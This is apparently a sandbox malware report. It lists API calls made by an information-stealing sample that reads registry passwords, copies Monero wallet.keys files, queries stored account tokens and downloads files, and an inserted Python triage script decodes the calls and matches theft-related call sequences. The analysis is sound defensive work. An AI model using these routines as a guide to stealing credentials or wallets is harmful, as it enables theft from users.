                                          • lstrcat.KERNEL32(00000000,00EB1808), ref: 00E976ED
                                          • task.LIBCPMTD ref: 00E976FB
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2176067098.0000000000E91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                           • Associated: 00000000.00000002.2176049629.0000000000E90000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176067098.0000000000F41000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176067098.0000000000F4D000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176067098.0000000000F72000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176067098.00000000010DA000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176228058.00000000010EE000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176228058.000000000126F000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176228058.000000000134A000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176228058.0000000001371000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176228058.0000000001378000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176228058.0000000001387000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176611925.0000000001388000.00000080.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176742102.0000000001520000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176758538.0000000001521000.00000080.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_e90000_file.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: lstrcat$Heap$EnumFreeOpenProcessValuetask
                                          • String ID: :
                                          • API String ID: 2677904052-3653984579
                                          • Opcode ID: 95ab1ccaa1cf62f09900f4b91feeba1774562ba60825eaaf6a667f00503ba142
                                          • Instruction ID: 833ad9436689d0983466838f06ad33ee62bbecfb7ea587f5f2e8658ec6520108
                                          • Opcode Fuzzy Hash: 95ab1ccaa1cf62f09900f4b91feeba1774562ba60825eaaf6a667f00503ba142
                                          • Instruction Fuzzy Hash: 5831A372A01109DFCF18EBB4DC5ADFF73B4BB48301B205058F942B7295CA39A946CB50
                                          APIs
                                            • Part of subcall function 00EAA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00EAA7E6
                                            • Part of subcall function 00E947B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00E94839
                                            • Part of subcall function 00E947B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00E94849
                                          • InternetOpenA.WININET(00EB0DF7,00000001,00000000,00000000,00000000), ref: 00E9610F
                                          • StrCmpCA.SHLWAPI(?,00BBFCF0), ref: 00E96147
                                          • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 00E9618F
                                          • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 00E961B3
                                          • InternetReadFile.WININET(?,?,00000400,?), ref: 00E961DC
                                          • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00E9620A
                                          • CloseHandle.KERNEL32(?,?,00000400), ref: 00E96249
                                          • InternetCloseHandle.WININET(?), ref: 00E96253
                                          • InternetCloseHandle.WININET(00000000), ref: 00E96260
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2176067098.0000000000E91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                           • Associated: 00000000.00000002.2176049629.0000000000E90000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176067098.0000000000F41000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176067098.0000000000F4D000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176067098.0000000000F72000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176067098.00000000010DA000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176228058.00000000010EE000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176228058.000000000126F000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176228058.000000000134A000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176228058.0000000001371000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176228058.0000000001378000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176228058.0000000001387000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176611925.0000000001388000.00000080.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176742102.0000000001520000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176758538.0000000001521000.00000080.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_e90000_file.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                                          • String ID:
                                          • API String ID: 2507841554-0
                                          • Opcode ID: 301a7cdbfb44dff4f2835b4408c48413751db3a8aa2f6d03202a544a7b8087ba
                                          • Instruction ID: 854ff19ae3cdd9931557d6123b3435895837a589beb71cf4679e6414616f0f19
                                          • Opcode Fuzzy Hash: 301a7cdbfb44dff4f2835b4408c48413751db3a8aa2f6d03202a544a7b8087ba
                                          • Instruction Fuzzy Hash: 1E5170B1A00208ABDF24DF60DC49BEE77B8FB44705F109099B606BB1C0DB796A85CF95
                                          APIs
                                          • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00E9733A
                                          • RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 00E973B1
                                          • StrStrA.SHLWAPI(00000000,Password,00000000), ref: 00E9740D
                                          • GetProcessHeap.KERNEL32(00000000,?), ref: 00E97452
                                          • HeapFree.KERNEL32(00000000), ref: 00E97459
                                          • task.LIBCPMTD ref: 00E97555
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2176067098.0000000000E91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                           • Associated: 00000000.00000002.2176049629.0000000000E90000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176067098.0000000000F41000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176067098.0000000000F4D000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176067098.0000000000F72000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176067098.00000000010DA000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176228058.00000000010EE000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176228058.000000000126F000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176228058.000000000134A000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176228058.0000000001371000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176228058.0000000001378000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176228058.0000000001387000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176611925.0000000001388000.00000080.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176742102.0000000001520000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176758538.0000000001521000.00000080.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_e90000_file.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Heap$EnumFreeOpenProcessValuetask
                                          • String ID: Password
                                          • API String ID: 775622407-3434357891
                                          • Opcode ID: 725580960b8c34a80187d9f3f1b4cc3e4b54955defa95e6da65b8fdd139fb5b4
                                          • Instruction ID: 54faf6b3a94f409eb8c0abecad1f3954f2124c2be50003f00c5452841910087a
                                          • Opcode Fuzzy Hash: 725580960b8c34a80187d9f3f1b4cc3e4b54955defa95e6da65b8fdd139fb5b4
                                          • Instruction Fuzzy Hash: 98613CB59142689BDF24DB50DC41BDAB7B8BF44304F0091E9E689B6141DBB06BC9CFA0
                                          APIs
                                            • Part of subcall function 00EAA740: lstrcpy.KERNEL32(00EB0E17,00000000), ref: 00EAA788
                                            • Part of subcall function 00EAA9B0: lstrlen.KERNEL32(?,00BB8938,?,\Monero\wallet.keys,00EB0E17), ref: 00EAA9C5
                                            • Part of subcall function 00EAA9B0: lstrcpy.KERNEL32(00000000), ref: 00EAAA04
                                            • Part of subcall function 00EAA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00EAAA12
                                            • Part of subcall function 00EAA920: lstrcpy.KERNEL32(00000000,?), ref: 00EAA972
                                            • Part of subcall function 00EAA920: lstrcat.KERNEL32(00000000), ref: 00EAA982
                                            • Part of subcall function 00EAA8A0: lstrcpy.KERNEL32(?,00EB0E17), ref: 00EAA905
                                            • Part of subcall function 00EAA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00EAA7E6
                                          • lstrlen.KERNEL32(00000000), ref: 00E9BC9F
                                            • Part of subcall function 00EA8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00EA8E52
                                          • StrStrA.SHLWAPI(00000000,AccountId), ref: 00E9BCCD
                                          • lstrlen.KERNEL32(00000000), ref: 00E9BDA5
                                          • lstrlen.KERNEL32(00000000), ref: 00E9BDB9
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2176067098.0000000000E91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                           • Associated: 00000000.00000002.2176049629.0000000000E90000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176067098.0000000000F41000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176067098.0000000000F4D000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176067098.0000000000F72000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176067098.00000000010DA000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176228058.00000000010EE000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176228058.000000000126F000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176228058.000000000134A000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176228058.0000000001371000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176228058.0000000001378000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176228058.0000000001387000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176611925.0000000001388000.00000080.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176742102.0000000001520000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176758538.0000000001521000.00000080.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_e90000_file.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: lstrcpy$lstrlen$lstrcat$AllocLocal
                                          • String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
                                          • API String ID: 3073930149-1079375795
                                          • Opcode ID: 80e14844078be5fc4903064c1d33b6de74182436c16767428091516d46cc7257
                                          • Instruction ID: 551b5d1e9d6b3f9a84b34a646b2de1fa51f5fbd33a5234c440f3cec7e6a19b33
                                          • Opcode Fuzzy Hash: 80e14844078be5fc4903064c1d33b6de74182436c16767428091516d46cc7257
                                          • Instruction Fuzzy Hash: DAB154729102049BCF58EBA0DD56EEE73B8AF59300F455168F5077A091EF387A49CB62
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2176067098.0000000000E91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                           • Associated: 00000000.00000002.2176049629.0000000000E90000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176067098.0000000000F41000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176067098.0000000000F4D000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176067098.0000000000F72000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176067098.00000000010DA000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176228058.00000000010EE000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176228058.000000000126F000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176228058.000000000134A000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176228058.0000000001371000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176228058.0000000001378000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176228058.0000000001387000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176611925.0000000001388000.00000080.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176742102.0000000001520000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176758538.0000000001521000.00000080.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_e90000_file.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ExitProcess$DefaultLangUser
                                          • String ID: *
                                          • API String ID: 1494266314-163128923
                                          • Opcode ID: 109fc0f7f7fe4b6067e18d65ce44db1ed75ef7f1a34ce09f06186a6aa73da3e5
                                          • Instruction ID: 5b56bd0dd1d1aa46786c3acf91d786b2ca5be74673a260982cf199b5dcaba66b
                                          • Opcode Fuzzy Hash: 109fc0f7f7fe4b6067e18d65ce44db1ed75ef7f1a34ce09f06186a6aa73da3e5
                                          • Instruction Fuzzy Hash: A7F08230A05209EFD3549FE0E90972C7B70FF0A707F080199FA4A97284DA7A5B41DF95
                                          APIs
                                          • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00E94FCA
                                          • RtlAllocateHeap.NTDLL(00000000), ref: 00E94FD1
                                          • InternetOpenA.WININET(00EB0DDF,00000000,00000000,00000000,00000000), ref: 00E94FEA
                                          • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 00E95011
                                          • InternetReadFile.WININET(?,?,00000400,00000000), ref: 00E95041
                                          • InternetCloseHandle.WININET(?), ref: 00E950B9
                                          • InternetCloseHandle.WININET(?), ref: 00E950C6
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2176067098.0000000000E91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                           • Associated: 00000000.00000002.2176049629.0000000000E90000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176067098.0000000000F41000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176067098.0000000000F4D000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176067098.0000000000F72000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176067098.00000000010DA000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176228058.00000000010EE000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176228058.000000000126F000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176228058.000000000134A000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176228058.0000000001371000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176228058.0000000001378000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176228058.0000000001387000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176611925.0000000001388000.00000080.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176742102.0000000001520000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176758538.0000000001521000.00000080.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_e90000_file.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessRead
                                          • String ID:
                                          • API String ID: 3066467675-0
                                          • Opcode ID: f2b0c353e6fb8ea51a780c0973961294559f29891868bde0828e2a24eaca2d6b
                                          • Instruction ID: bd64a2ae1cb6754aa29ba77713d494f4751cf398792d6f0788c53d911ef4678b
                                          • Opcode Fuzzy Hash: f2b0c353e6fb8ea51a780c0973961294559f29891868bde0828e2a24eaca2d6b
                                          • Instruction Fuzzy Hash: BA3104B5A00218EBDB20CF54DC85BDDB7B4FB48704F1081D9EA09B7280C7746A858F98
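                                           The function listings above are easier to triage once the raw hex arguments are read as Win32 constants: the wallet routine under subcall 00E912A0 opens its registry key with samDesired 00020119, the download routine creates its output file with access 40000000 and disposition 00000002, and the fetch routine just above opens its URL with flags 04000100. The Python script below is an added example for reading this report, not Joe Sandbox code and not code from the sample. It parses lines in the report's `API.MODULE(args), ref: addr` format, decodes a handful of argument positions using standard winreg.h, winnt.h and wininet.h values (argument positions follow the documented prototypes), and matches two ordered call subsequences. The two sample traces are constructed from lines copied from the listings above; the behaviour labels and the "?"-means-unresolved convention are this example's own assumptions.

```python
"""Decode Joe Sandbox API-list lines into named Win32 constants and flag call sequences.
Added example, not report or Joe Sandbox code. Constant values are standard (winreg.h,
winnt.h, wininet.h); argument positions follow the documented prototypes; the behaviour
labels and the two sample traces are constructed for this example."""
import re
from collections import namedtuple

LINE_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-F]{8}): )?"
    r"(?P<api>\w+)\.(?P<mod>\w+)(?:\((?P<args>.*)\))?,? ref: (?P<ref>[0-9A-F]{8})\s*$")
HEX_RE = re.compile(r"-?[0-9A-F]{8}")
Call = namedtuple("Call", "api module args ref subcall_of")

# Flag tables list composite masks first so KEY_READ is consumed before its member bits.
KEY_ACCESS = [(0x20019, "KEY_READ"), (0x200, "KEY_WOW64_32KEY"), (0x100, "KEY_WOW64_64KEY"),
              (0x1, "KEY_QUERY_VALUE"), (0x2, "KEY_SET_VALUE")]
FILE_ACCESS = [(0x80000000, "GENERIC_READ"), (0x40000000, "GENERIC_WRITE")]
SHARE_MODE = [(1, "FILE_SHARE_READ"), (2, "FILE_SHARE_WRITE"), (4, "FILE_SHARE_DELETE")]
INET_FLAGS = [(0x80000000, "INTERNET_FLAG_RELOAD"), (0x04000000, "INTERNET_FLAG_NO_CACHE_WRITE"),
              (0x00800000, "INTERNET_FLAG_SECURE"), (0x00000100, "INTERNET_FLAG_PRAGMA_NOCACHE")]
HKEY = {0x80000000: "HKEY_CLASSES_ROOT", 0x80000001: "HKEY_CURRENT_USER", 0x80000002: "HKEY_LOCAL_MACHINE"}
DISPOSITION = {1: "CREATE_NEW", 2: "CREATE_ALWAYS", 3: "OPEN_EXISTING", 4: "OPEN_ALWAYS", 5: "TRUNCATE_EXISTING"}
OPEN_TYPE = {0: "INTERNET_OPEN_TYPE_PRECONFIG", 1: "INTERNET_OPEN_TYPE_DIRECT", 3: "INTERNET_OPEN_TYPE_PROXY"}
# (argument index, parameter name, enum dict or flag table) per API.
ARG_DECODERS = {
    "RegOpenKeyExA": [(0, "hKey", HKEY), (3, "samDesired", KEY_ACCESS)],
    "CreateFileA": [(1, "dwDesiredAccess", FILE_ACCESS), (2, "dwShareMode", SHARE_MODE),
                    (4, "dwCreationDisposition", DISPOSITION)],
    "InternetOpenA": [(1, "dwAccessType", OPEN_TYPE)],
    "InternetOpenUrlA": [(4, "dwFlags", INET_FLAGS)],
}
# Ordered API subsequences (intervening calls allowed) that summarise a listing.
BEHAVIOURS = {
    "file located via registry, copied, read, copy deleted": ["RegQueryValueExA", "CopyFileA", "ReadFile", "DeleteFileA"],
    "URL content written to disk": ["InternetOpenUrlA", "CreateFileA", "InternetReadFile", "WriteFile"],
}

def parse_arg(token):
    token = token.strip()
    if token == "?":
        return None            # assumption: "?" marks a value the sandbox did not resolve
    if HEX_RE.fullmatch(token):
        return int(token, 16)  # fixed-width hex, e.g. 00020119 or -00000001
    return token               # inline string argument such as ".keys"

def parse_trace(text):
    calls = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue           # headers such as "Strings" or "APIs" are skipped
        raw = m.group("args")
        args = [parse_arg(a) for a in raw.split(",")] if raw else []
        calls.append(Call(m.group("api"), m.group("mod"), args, m.group("ref"), m.group("sub") or ""))
    return calls

def decode_value(value, table):
    """Enum dicts map to one name; flag tables peel masks off and keep leftover bits as hex."""
    if isinstance(table, dict):
        return table.get(value, hex(value))
    names, rest = [], value
    for mask, name in table:
        if (rest & mask) == mask:
            names.append(name)
            rest &= ~mask
    if rest:
        names.append(hex(rest))
    return names

def decode_call(call):
    out = {}
    for index, name, table in ARG_DECODERS.get(call.api, []):
        if index < len(call.args) and isinstance(call.args[index], int):
            out[name] = decode_value(call.args[index], table)
    return out

def is_subsequence(pattern, names):
    it = iter(names)
    return all(any(n == p for n in it) for p in pattern)

def classify(calls):
    names = [c.api for c in calls]
    return [label for label, pattern in BEHAVIOURS.items() if is_subsequence(pattern, names)]

# Constructed samples: lines copied from two of the function listings above.
WALLET_TRACE = """\
• Part of subcall function 00E912A0: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 00E912D7
• Part of subcall function 00E912A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 00E912F5
• lstrcat.KERNEL32(?,.keys), ref: 00E91377
• CopyFileA.KERNEL32(?,00000000,00000001), ref: 00E91465
• Part of subcall function 00E999C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00E999EC
• Part of subcall function 00E999C0: ReadFile.KERNEL32(000000FF,?,00000000,00E9148F,00000000), ref: 00E99A5A
• DeleteFileA.KERNEL32(00000000), ref: 00E914EF
"""
DOWNLOAD_TRACE = """\
• InternetOpenA.WININET(00EB0DF7,00000001,00000000,00000000,00000000), ref: 00E9610F
• InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 00E9618F
• CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 00E961B3
• InternetReadFile.WININET(?,?,00000400,?), ref: 00E961DC
• WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00E9620A
"""

if __name__ == "__main__":
    for trace in (WALLET_TRACE, DOWNLOAD_TRACE):
        calls = parse_trace(trace)
        print(classify(calls), [(c.ref, c.api, decode_call(c)) for c in calls if decode_call(c)])
```

                                           Two things the decoded values make visible. First, 00020119 is KEY_READ | KEY_WOW64_64KEY: the sample is 32-bit (all addresses are 8 hex digits), so it explicitly asks for the 64-bit view of SOFTWARE\monero-project\monero-core rather than the WOW6432Node redirection it would otherwise get. Second, the download routine writes with CREATE_ALWAYS and FILE_SHARE_READ | FILE_SHARE_WRITE, while the fetch routine above uses INTERNET_FLAG_NO_CACHE_WRITE | INTERNET_FLAG_PRAGMA_NOCACHE so nothing lands in the WinINet cache. The subsequence match ignores intervening calls and is meant for triage of these listings, not as a host detection rule; note in particular that RegQueryValueExA reads generate no Sysmon registry event (IDs 12 to 14 cover create, delete, set and rename), so endpoint coverage of this routine rests on the CopyFileA of wallet.keys to a new path followed by DeleteFileA, not on the registry lookup.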
                                          APIs
                                          • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,00BBF518,00000000,?,00EB0E2C,00000000,?,00000000), ref: 00EA8130
                                          • RtlAllocateHeap.NTDLL(00000000), ref: 00EA8137
                                          • GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 00EA8158
                                          • wsprintfA.USER32 ref: 00EA81AC
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2176067098.0000000000E91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                           • Associated: 00000000.00000002.2176049629.0000000000E90000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176067098.0000000000F41000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176067098.0000000000F4D000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176067098.0000000000F72000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176067098.00000000010DA000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176228058.00000000010EE000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176228058.000000000126F000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176228058.000000000134A000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176228058.0000000001371000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176228058.0000000001378000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176228058.0000000001387000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176611925.0000000001388000.00000080.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176742102.0000000001520000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2176758538.0000000001521000.00000080.00000001.01000000.00000003.sdmp
                                          Similarity
                                          • API ID: Heap$AllocateGlobalMemoryProcessStatuswsprintf
                                          • String ID: %d MB$@
                                          • API String ID: 2922868504-3474575989
                                          APIs
                                          • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00EA8426
                                          • wsprintfA.USER32 ref: 00EA8459
                                          • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 00EA847B
                                          • RegCloseKey.ADVAPI32(00000000), ref: 00EA848C
                                          • RegCloseKey.ADVAPI32(00000000), ref: 00EA8499
                                            • Part of subcall function 00EAA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00EAA7E6
                                          • RegQueryValueExA.ADVAPI32(00000000,00BBF488,00000000,000F003F,?,00000400), ref: 00EA84EC
                                          • lstrlen.KERNEL32(?), ref: 00EA8501
                                          • RegQueryValueExA.ADVAPI32(00000000,00BBF2D8,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,00EB0B34), ref: 00EA8599
                                          • RegCloseKey.ADVAPI32(00000000), ref: 00EA8608
                                          • RegCloseKey.ADVAPI32(00000000), ref: 00EA861A
                                          Similarity
                                          • API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
                                          • String ID: %s\%s
                                          • API String ID: 3896182533-4073750446
                                          APIs
                                          • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00EA76A4
                                          • RtlAllocateHeap.NTDLL(00000000), ref: 00EA76AB
                                          • RegOpenKeyExA.ADVAPI32(80000002,00BAB8B0,00000000,00020119,00000000), ref: 00EA76DD
                                          • RegQueryValueExA.ADVAPI32(00000000,00BBF3C8,00000000,00000000,?,000000FF), ref: 00EA76FE
                                          • RegCloseKey.ADVAPI32(00000000), ref: 00EA7708
                                          Similarity
                                          • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                          • String ID: Windows 11
                                          • API String ID: 3225020163-2517555085
                                          APIs
                                          • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00EA7734
                                          • RtlAllocateHeap.NTDLL(00000000), ref: 00EA773B
                                          • RegOpenKeyExA.ADVAPI32(80000002,00BAB8B0,00000000,00020119,00EA76B9), ref: 00EA775B
                                          • RegQueryValueExA.ADVAPI32(00EA76B9,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 00EA777A
                                          • RegCloseKey.ADVAPI32(00EA76B9), ref: 00EA7784
                                          Similarity
                                          • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                          • String ID: CurrentBuildNumber
                                          • API String ID: 3225020163-1022791448
                                          APIs
                                          • CreateFileA.KERNEL32(:,80000000,00000003,00000000,00000003,00000080,00000000,?,00EA3AEE,?), ref: 00EA92FC
                                          • GetFileSizeEx.KERNEL32(000000FF,:), ref: 00EA9319
                                          • CloseHandle.KERNEL32(000000FF), ref: 00EA9327
                                          Similarity
                                          • API ID: File$CloseCreateHandleSize
                                          • String ID: :$:
                                          • API String ID: 1378416451-4250114551
                                          APIs
                                          • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00E999EC
                                          • GetFileSizeEx.KERNEL32(000000FF,?), ref: 00E99A11
                                          • LocalAlloc.KERNEL32(00000040,?), ref: 00E99A31
                                          • ReadFile.KERNEL32(000000FF,?,00000000,00E9148F,00000000), ref: 00E99A5A
                                          • LocalFree.KERNEL32(00E9148F), ref: 00E99A90
                                          • CloseHandle.KERNEL32(000000FF), ref: 00E99A9A
                                          Similarity
                                          • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                                          • String ID:
                                          • API String ID: 2311089104-0
                                          APIs
                                          • lstrcat.KERNEL32(?,00BBF608), ref: 00EA47DB
